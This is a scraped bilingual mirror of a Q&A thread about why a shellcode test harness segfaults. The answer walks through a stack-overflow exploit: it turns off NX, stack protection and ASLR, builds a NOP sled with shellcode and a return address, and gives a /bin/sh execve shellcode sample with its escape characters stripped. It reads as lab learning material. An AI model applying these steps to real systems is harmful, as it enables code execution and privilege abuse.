Shellcode 没有运行 [英] Shellcode not running

问题描述

我尝试通过 C 程序运行很多 shell 代码来测试它们.在这里

I've tried to run a lot of shell-codes via C program to test them. Here it is

#include<stdio.h>
#include<string.h>
unsigned char code[] = "shell here";
main()
{
printf("Shellcode Length: %d
", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

这里是shellcode的例子

And here's example of shellcode

"x31xc0xb0x46x31xdbx31xc9xcdx80xeb"
          "x16x5bx31xc0x88x43x07x89x5bx08x89"
          "x43x0cxb0x0bx8dx4bx08x8dx53x0cxcd"
          "x80xe8xe5xffxffxffx2fx62x69x6ex2f"
          "x73x68x58x41x41x41x41x42x42x42x42"

(incat etcshadow)运行后

(incat etcshadow) After running

gcc sctest.c -o out./out

它只是给了我 shellcode 长度和分段错误我已经尝试了很多不同的 shellcode，但一切都给了我段错误我的dmesg |尾-1[18440.783383] 测试[8768]:8049700 ip 08049700 sp bffff2ec 测试中的错误 15 [8049000+1000] 的段错误我的 shellcode 有什么问题?

It's just gives me shellcode length and Segmentation Fault I've already tried a lot of different shellcodes but everything just gives me segfault My dmesg | tail -1 [18440.783383] test[8768]: segfault at 8049700 ip 08049700 sp bffff2ec error 15 in test[8049000+1000] What's wrong with my shellcodes?

推荐答案

在禁用 NX-bit 和其他类似 randomize_va_space 的东西后，我终于做到了.

After disabling NX-bit and other things like randomize_va_space I've finally done it.

首先你应该使用 -z execstack 和 -fno-stack-protector 键编译你的可执行文件.

Firstly you should compile your executable with keys -z execstack and -fno-stack-protector.

之后禁用 ASLR echo 0 >/proc/sys/kernel/randomize_va_space.现在你必须找到shellcode.您可以尝试 mspayload 或 msfvenom.Shellcode 是一个字节码，通常会为您提供 shell.

After that disable ASLR echo 0 > /proc/sys/kernel/randomize_va_space. Now you have to find shellcode. You can try mspayload or msfvenom. Shellcode is a bytecode which usually gives you shell.

在该步骤中，您应该找到堆栈溢出的偏移量.您可以尝试查找类似

On that step you should find offset for your stack overflow. You can try to find lines like

sub hex-offset, %esp

或者您可以尝试使用简单的脚本(例如 ./your_binary <python -c "p​​rint('A')*n") 其中 n 是你的偏移量

Or you can try to bruteforce it with simple script like ./your_binary < python -c "print('A')*n") where n is your offset

找到偏移后(SEGFAULT 发生并且 dmesg | tail -1 说 %eip 是 0x41414141)你只需要编写你的漏洞利用.它的结构是这样的

After finding offset(SEGFAULT occurs and dmesg | tail -1 says that %eip is 0x41414141) you just need to write your exploit. It's structure looks like that

NOPs(no operation)*x+shellcode+return-address(4 bytes)*y

len(shellcode)+x+4y=你的偏移量返回地址是堆栈中 NOP 所在位置的地址(输入前在 gdb info r 中看到的 %esp 地址)

len(shellcode)+x+4y=your offset Where return address is an address of the place in the stack where your NOPs are located(address of %esp which you see in gdb info r before input)

并且不要忘记，如果没有 gdb，在 gdb 中工作的漏洞利用将无法工作，因为您需要从返回地址中添加/减去 36 个字节.

And don't forget that exploit which works in gdb won't work without gdb because you need to add/substract 36 bytes from your return address.

终于可以利用了

./your_binary < exploit.bin

这篇关于Shellcode 没有运行的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！